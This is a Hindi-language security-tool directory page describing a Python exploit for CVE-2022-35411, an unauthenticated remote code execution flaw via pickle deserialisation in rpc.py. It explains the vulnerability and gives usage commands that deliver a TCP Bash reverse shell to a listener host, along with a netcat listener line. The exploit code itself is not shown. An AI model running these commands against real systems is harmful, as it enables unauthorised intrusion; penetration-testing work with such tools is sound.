Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
rpc-rce.py — CVE-2022-35411 के लिए शोषण — rpc.py में अप्रमाणित RCE (<= 0.6.0) | Kitploit
उपकरण/GitHubGitHub/cspanias/rpc-rce.py
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubcspanias/rpc-rce.py

rpc-rce.py

CVE-2022-35411 के लिए शोषण — rpc.py में अप्रमाणित RCE (<= 0.6.0)

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

rpc.py RCE शोषण (CVE-2022-35411)

यह CVE-2022-35411 के लिए एक अद्यतन और बेहतर शोषण है, जो rpc.py के असुरक्षित संस्करणों (<= 0.6.0) को लक्षित करता है।
यह Python pickle डिसीरियलाइज़ेशन के माध्यम से अप्रमाणित दूरस्थ कोड निष्पादन (RCE) की अनुमति देता है।

मूल शोषण: Elias Hohl
उन्नत: x7331 द्वारा उपयोगिता, पोर्टेबिलिटी और स्वचालन के लिए


कमजोरी का सारांश

कमजोरी rpc.py के Python के pickle मॉड्यूल के असुरक्षित उपयोग में निहित है, जो तैयार किए गए पेलोड को बिना प्रमाणीकरण के मनमाने आदेश निष्पादित करने की अनुमति देती है।

  • CVE ID: CVE-2022-35411
  • प्रभावित संस्करण: rpc.py v0.4.2 – v0.6.0
  • शोषण प्रकार: अप्रमाणित दूरस्थ कोड निष्पादन (RCE)

परिवर्तन

  • ✅ argparse पर स्विच किया गया जिसमें --lhost, --lport, --target, और --dry-run फ्लैग हैं
  • ✅ स्वच्छ, मॉड्यूलर कोड संरचना
  • ✅ वैकल्पिक रिवर्स शेल वितरण (TCP Bash)
  • ✅ कर्ल परीक्षण पेलोड (सुरक्षित मोड)
  • ✅ लॉगिंग समर्थन और स्वच्छ आउटपुट
  • ✅ -h / --help के माध्यम से उचित उपयोग मार्गदर्शन
  • ✅ स्पष्टता के लिए मेटाडेटा और इनलाइन टिप्पणियाँ

उपयोग

रिवर्स शेल उदाहरण

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001

ड्राई रन (कोई शेल नहीं, केवल कर्ल परीक्षण)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run

कस्टम लक्ष्य (वैकल्पिक)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi

आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी (pip install requests से इंस्टॉल करें)
  • आपके LHOST पर एक लिसनर (जैसे, nc -lvnp 9001)
  • असुरक्षित rpc.py सर्वर चल रहा हो

कानूनी और नैतिक सूचना

यह शोषण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसे उन सिस्टमों पर उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।

टूल डाउनलोड करें